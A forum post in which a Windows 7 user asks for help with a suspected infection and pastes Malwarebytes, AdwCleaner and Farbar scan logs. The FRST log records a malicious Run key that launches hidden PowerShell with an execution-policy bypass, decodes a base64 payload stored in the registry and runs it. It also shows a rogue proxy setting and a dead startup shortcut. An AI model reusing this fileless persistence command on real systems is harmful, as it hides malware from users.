Help , am i infected?


Hello, I'm new to this forum.

I keep getting this blocked by Malwarebytes:

-Website Data-
Domain: qibrasob.ru
IP Address: 62.210.172.214
Port: [50152]
Type: Outbound
File: C:\Windows\SysWOW64\msiexec.exe

I also keep getting a CMD popup installing an unknown application.

When I look in Task Manager it shows taskeng.exe; it keeps showing even after I have terminated it.

And because I'm a newbie, I did a system restore.

The CMD popups stopped, but my computer became unstable (slow response, sometimes freezes, and Task Manager sometimes can't be opened).

Following the tutorial here, I have done a couple of things:

1. Tried scanning with Malwarebytes Anti-Malware

   Result: can't finish the scan even after waiting 14 hours (computer freezes / Malwarebytes stops responding)

2. AdwCleaner

   Result:

# AdwCleaner 7.0.0.0 - Logfile created on Sun Jul 30 03:35:36 2017
# Updated on 2017/17/07 by Malwarebytes 
# Running on Windows 7 Ultimate (X64)
# Mode: clean
# Support: https://www.malwarebytes.com/support

***** [ Services ] *****

No malicious services deleted.

***** [ Folders ] *****

Deleted: C:\ProgramData\Mail.Ru
Deleted: C:\ProgramData\Application Data\Mail.Ru
Deleted: C:\Users\All Users\Mail.Ru
Deleted: C:\Users\AMD\AppData\Local\Mail.Ru
Deleted: C:\Users\AMD\AppData\Roaming\ProgSense
Deleted: C:\Users\AMD\AppData\Roaming\GrabPro
Deleted: C:\Program Files (x86)\orbitdownloader
Deleted: C:\Users\All Users\Documents\Guid
Deleted: C:\Users\Public\Documents\Guid
Deleted: C:\Users\AMD\AppData\Roaming\Event Monitor
Deleted: C:\Users\AMD\AppData\Roaming\WMPNetworkAcSvc
Deleted: C:\Users\AMD\AppData\Local\AdvinstAnalytics
Deleted: C:\Users\All Users\Documents\XMUpdate
Deleted: C:\Users\Public\Documents\XMUpdate
Deleted: C:\Users\AMD\AppData\Roaming\Microleaves
Deleted: C:\Program Files\Enigma Software Group
Deleted: C:\Users\AMD\AppData\Roaming\Enigma Software Group
Deleted: C:\sh4ldr
Deleted: C:\Users\AMD\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\spyhunter
Deleted: C:\Program Files (x86)\CalendarTool
Deleted: C:/Program Files\cc6a8b3c59162b988afae6435f068f15
Deleted: C:/Program Files\3bb3e72544991598455f3e86fb41a473


***** [ Files ] *****

Deleted: C:\Users\AMD\Favorites\Mail.Ru.url
Deleted: C:\Users\AMD\Favorites\Mail.Ru Агент - используй для общения!.url
Deleted: C:\Users\AMD\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HowToRemove.html.lnk


***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks deleted.

***** [ Registry ] *****

Deleted: [Data] - HKCU\Software\Microsoft\Internet Explorer\Main|Start Page [http://search.orbitdownloader.com]
Deleted: [Key] - HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\Software\ProgSense
Deleted: [Key] - HKCU\Software\ProgSense
Deleted: [Key] - HKLM\SOFTWARE\Orbit
Deleted: [Key] - HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\Software\Orbit
Deleted: [Key] - HKCU\Software\Orbit
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{000123B4-9B42-4900-B3F7-F4B073EFC214}
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{000123B4-9B42-4900-B3F7-F4B073EFC214}
Deleted: [Key] - HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{000123B4-9B42-4900-B3F7-F4B073EFC214}
Deleted: [Key] - HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{000123B4-9B42-4900-B3F7-F4B073EFC214}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{3F1D494B-0CEF-4468-96C9-386E2E4DEC90}
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4250488A-CB24-0893-C066-B1AEA57BCFF2}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{7854F00C-DC77-477E-A10E-603F48442D3B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\TypeLib\{A0880527-DC28-4EBB-BA27-D22102F22A9F}
Deleted: [Key] - HKLM\SOFTWARE\Classes\TypeLib\{BCDDE143-FAE3-4C57-B22B-C4E8678CFDC0}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{C55BBCD6-41AD-48AD-9953-3609C48EACC7}
Deleted: [Value] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar|{C55BBCD6-41AD-48AD-9953-3609C48EACC7}
Deleted: [Key] - HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{C55BBCD6-41AD-48AD-9953-3609C48EACC7}
Deleted: [Key] - HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{C55BBCD6-41AD-48AD-9953-3609C48EACC7}
Deleted: [Value] - HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser|{C55BBCD6-41AD-48AD-9953-3609C48EACC7}
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\MenuExt\&Download by Orbit
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\MenuExt\&Grab video by Orbit
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\MenuExt\Do&wnload selected by Orbit
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\MenuExt\Down&load all by Orbit
Deleted: [Key] - HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\Software\csastats
Deleted: [Key] - HKCU\Software\csastats


***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries deleted.

***** [ Chromium (and derivatives) ] *****

Plugin deleted: Search Manager - 
SearchProvider deleted: AOL - aol.com
SearchProvider deleted: Ask - ask.com


*************************

::Tracing keys deleted
::Winsock settings cleared
::Additional Actions: 0

*************************

C:/AdwCleaner/AdwCleaner[S0].txt - [5408 B] - [2017/7/30 3:34:48]


########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt ##########

3. Farbar Recovery Scan Tool

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 29-07-2017
Ran by AMD (administrator) on AMD-PC (30-07-2017 10:48:54)
Running from C:\Users\AMD\Desktop
Loaded Profiles: AMD (Available Profiles: AMD)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 8 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Smadsoft) C:\Program Files (x86)\SMADAV\SMΔRTP.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Hi-Rez Studios) C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Apple Inc.) D:\Program Files\iTunes\iTunesHelper.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Smadav Software) C:\Program Files (x86)\SMADAV\SmadavProtect64.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Steganos Software GmbH) C:\Program Files (x86)\OkayFreedom\OkayFreedomService.exe
(Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DTAgent.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
() C:\Windows\SysWOW64\PnkBstrA.exe
() C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Razer Inc.) C:\Program Files (x86)\Razer\Razer Cortex\RzKLService.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
() C:\Users\AMD\AppData\Local\MiPhoneManager\main\MiPhoneHelper.exe
(MY.COM B.V.) C:\Users\AMD\AppData\Local\MyComGames\MyComGames.exe
(Cyberlink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD\PDVDServ.exe
(Steganos Software GmbH) C:\Program Files (x86)\OkayFreedom\Notifier.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvspcaps64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12503184 2012-06-11] (Realtek Semiconductor)
HKLM\...\Run: [iTunesHelper] => D:\Program Files\iTunes\iTunesHelper.exe [303928 2017-03-22] (Apple Inc.)
HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [3146704 2017-05-09] (Malwarebytes)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation)
HKLM-x32\...\Run: [RemoteControl] => C:\Program Files (x86)\CyberLink\PowerDVD\PDVDServ.exe [29696 2006-09-18] (Cyberlink Corp.)
HKLM-x32\...\Run: [LanguageShortcut] => C:\Program Files (x86)\CyberLink\PowerDVD\Language\Language.exe [49152 2006-09-29] ()
HKLM-x32\...\Run: [SMΔRT-Protection] => C:\Program Files (x86)\Smadav\SMΔRTP.exe [1814528 2017-05-21] (Smadsoft)
HKLM-x32\...\Run: [OKAYFREEDOM Notifier] => C:\Program Files (x86)\OkayFreedom\Notifier.exe [4047888 2016-06-29] (Steganos Software GmbH)
HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8698584 2016-04-16] (Piriform Ltd)
HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4958912 2016-11-17] (Disc Soft Ltd)
HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\...\Run: [MiPhoneManager] => C:\Users\AMD\AppData\Local\MiPhoneManager\main\MiPhoneHelper.exe [146224 2017-03-17] ()
HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\...\Run: [MyComGames] => C:\Users\AMD\AppData\Local\MyComGames\MyComGames.exe [5546704 2017-07-30] (MY.COM B.V.)
HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\...\Run: [{2B7032A0-5561-422F-BE3C-78694DD4F94A}] => powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\ZSYQAG').MrBFadzSpX))); <==== ATTENTION
HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\...\Policies\Explorer: [DisallowRun] 1
HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\...\Policies\Explorer\DisallowRun: [1] Mshta.exe
HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\...\Policies\Explorer\DisallowRun: [2] powershell.exe
HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\...\Policies\Explorer\DisallowRun: [3] bitsadmin.exe
Startup: C:\Users\AMD\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\w.lnk [2017-07-04]
ShortcutTarget: w.lnk -> C:\Users\AMD\AppData\Roaming\eeiQ7lT6kG.exe (No File)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.100.1
Tcpip\..\Interfaces\{0B54D4E3-C792-46C6-907A-8D65026C57F4}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{38C68C9E-E199-4048-A69D-3D5DC75B6142}: [DhcpNameServer] 192.168.100.1
Tcpip\..\Interfaces\{68E9DC45-676E-471D-9AB8-BB7ABFDB663A}: [DhcpNameServer] 192.168.43.1

Internet Explorer:
==================
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\Software\Microsoft\Internet Explorer\Main,Start Page = 
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-1646343962-1068419023-3029431551-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-1646343962-1068419023-3029431551-1000 -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = hxxps://id.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wnf_ir_16_43&param1=1&param2=f%3D4%26b%3DIE%26cc%3Did%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuzytDtB0BtAyEzz0A0E0D0A0F0DzyyDyEtN0D0Tzu0StCyByCtDtN1L2XzutAtFtByEtFtByBtFyDtDtN1L1Czu1ByDtN1L1G1B1V1N2Y1L1Qzu2StAtByCtBtBtC0CtBtGyB0BzztDtGyBzy0D0CtGtCtB0AtDtGtB0CtCyEyB0CzztA0BtDyCzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0AyE0B0CtDyB0CtCtGtBtDzy0FtGyE0A0CyCtGzy0B0A0CtG0Bzz0F0CtAtByCyBtCyD0DtD2QtN0A0LzutBtN1B2Z1V1T1S1NzutCtDyDyDyE%26cr%3D1422809106%26a%3Dwnf_ir_16_43%26os_ver%3D6.1%26os%3DWindows%2B7%2BUltimate&p={searchTerms}
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2016-07-13] (Internet Download Manager, Tonec Inc.)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2010-03-25] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2016-07-13] (Internet Download Manager, Tonec Inc.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2010-03-25] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\ssv.dll [2016-08-15] (Oracle Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\jp2ssv.dll [2016-08-15] (Oracle Corporation)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-21] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-21] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-21] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-21] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: ojobnyh6.default
FF ProfilePath: C:\Users\AMD\AppData\Roaming\Mozilla\Firefox\Profiles\ojobnyh6.default [2017-07-30]
FF NewTab: Mozilla\Firefox\Profiles\ojobnyh6.default -> about:newtab
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\ojobnyh6.default -> Yahoo! Powered
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\ojobnyh6.default -> Yahoo! Powered
FF Homepage: Mozilla\Firefox\Profiles\ojobnyh6.default -> hxxp://search.orbitdownloader.com
FF Keyword.URL: Mozilla\Firefox\Profiles\ojobnyh6.default -> user_pref("keyword.URL", true);
FF NetworkProxy: Mozilla\Firefox\Profiles\ojobnyh6.default -> autoconfig_url", "data:text/plain, function FindProxyForURL(url, host) {if(isInNet(host, '192.168.0.0', '255.255.0.0')) return 'DIRECT'; \nif(host == 'us1-base.cd-n.net') return 'DIRECT'; \nif(host == 'us2-base.cd-n.net') return 'DIRECT'; \nif(host == 'us3-base.cd-n.net') return 'DIRECT'; \nif(host == 'us4-base.cd-n.net') return 'DIRECT'; \nif(host == 'jp1-base.cd-n.net') return 'DIRECT'; \nif(host == 'de1-base.cd-n.net') return 'DIRECT'; \nif(host == 'au1-base.cd-n.net') return 'DIRECT'; \nif(host == 'ca1-base.cd-n.net') return 'DIRECT'; \nif(host == 'ir1-base.cd-n.net') return 'DIRECT'; \nif(host == 'sg1-base.cd-n.net') return 'DIRECT'; \nif(host == 'kr1-base.cd-n.net') return 'DIRECT'; \nif(host == '127.0.0.1') return 'DIRECT'; \nif(host == 'localhost') return 'DIRECT'; \nif(host == 'sg1-base.cd-n.net') return 'DIRECT'; \nreturn 'HTTPS GE4DKLRYGYXDCNBYFY2DQIZRGQ3TANJSHAYDAMA.mycdns.com:443';}"
FF NetworkProxy: Mozilla\Firefox\Profiles\ojobnyh6.default -> type", 0
FF Extension: (No Name) - C:\Users\AMD\AppData\Roaming\Mozilla\Firefox\Profiles\ojobnyh6.default\Extensions\homepage@mail.ru [2017-07-30] [not signed]
FF Extension: (No Name) - C:\Users\AMD\AppData\Roaming\Mozilla\Firefox\Profiles\ojobnyh6.default\Extensions\search@mail.ru [2017-07-30] [not signed]
FF Extension: (No Name) - C:\Users\AMD\AppData\Roaming\Mozilla\Firefox\Profiles\ojobnyh6.default\Extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7} [2017-07-30] [not signed]
FF HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\...\Firefox\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2016-08-03]
FF HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\AMD\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\AMD\AppData\Roaming\IDM\idmmzcc5 [2017-07-30] [not signed]
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\dtplugin\npDeployJava1.dll [2016-08-15] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\plugin2\npjp2.dll [2016-08-15] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-06-28] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-06-28] (NVIDIA Corporation)
FF Plugin-x32: @real.com/nppl3260;version=6.0.12.450 -> C:\Program Files (x86)\Real Alternative\browser\plugins\nppl3260.dll [2010-02-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpjplug;version=6.0.12.448 -> C:\Program Files (x86)\Real Alternative\browser\plugins\nprpjplug.dll [2010-02-16] (RealNetworks, Inc.)
FF Plugin-x32: @t.garena.com/garenatalk -> C:\Program Files (x86)\Garena Plus\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1646343962-1068419023-3029431551-1000: @my.com/Games -> C:\Users\AMD\AppData\Local\MyComGames\NPMyComDetector.dll [2017-05-04] (MY.COM B.V.)
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\itms.js [2017-03-23]

Chrome: 
=======
CHR DefaultSearchURL: Default -> hxxps://duckduckgo.com/?q={searchTerms}
CHR DefaultSearchKeyword: Default -> duckduckgo
CHR DefaultSuggestURL: Default -> hxxps://ac.duckduckgo.com/ac/?q={searchTerms}&type=list
CHR Profile: C:\Users\AMD\AppData\Local\Google\Chrome\User Data\Default [2017-07-30]
CHR Extension: (Google Slides) - C:\Users\AMD\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-07-30]
CHR Extension: (Google Docs) - C:\Users\AMD\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-07-30]
CHR Extension: (Google Drive) - C:\Users\AMD\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-07-30]
CHR Extension: (YouTube) - C:\Users\AMD\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-07-30]
CHR Extension: (Google Sheets) - C:\Users\AMD\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-07-30]
CHR Extension: (Google Docs Offline) - C:\Users\AMD\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-07-30]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\AMD\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2017-07-30]
CHR Extension: (Chrome Web Store Payments) - C:\Users\AMD\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-07-30]
CHR Extension: (Gmail) - C:\Users\AMD\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-07-30]
CHR Extension: (Chrome Media Router) - C:\Users\AMD\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-07-30]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2016-08-05]
CHR HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1646343962-1068419023-3029431551-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2017-03-17] (Apple Inc.)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [1536520 2017-07-19] ()
R3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1473216 2016-11-17] (Disc Soft Ltd)
S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [242960 2016-11-01] (EasyAntiCheat Ltd)
S3 FLEXnet Licensing Service; C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [654848 2016-08-03] (Macrovision Europe Ltd.) [File not signed]
U2 HiPatchService; C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2016-10-10] (Hi-Rez Studios) [File not signed]
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4470736 2017-05-09] (Malwarebytes)
S3 npggsvc; C:\Windows\SysWOW64\GameMon.des [5999752 2016-08-22] (INCA Internet Co., Ltd.)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [495040 2017-06-28] (NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [495040 2017-06-28] (NVIDIA Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-06-28] (NVIDIA Corporation)
R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [449984 2017-06-28] (NVIDIA Corporation)
R2 OkayFreedom VPN Starter Service; C:\Program Files (x86)\OkayFreedom\OkayFreedomService.exe [341024 2016-06-29] (Steganos Software GmbH)
S3 PAExec; C:\Windows\PAExec.exe [189112 2017-07-21] (Power Admin LLC)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76152 2017-07-27] ()
R2 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [189264 2016-09-25] ()
R2 RzKLService; C:\Program Files (x86)\Razer\Razer Cortex\RzKLService.exe [133376 2016-09-28] (Razer Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 DroidCam; C:\Windows\System32\DRIVERS\droidcam.sys [33592 2017-03-11] (Dev47Apps)
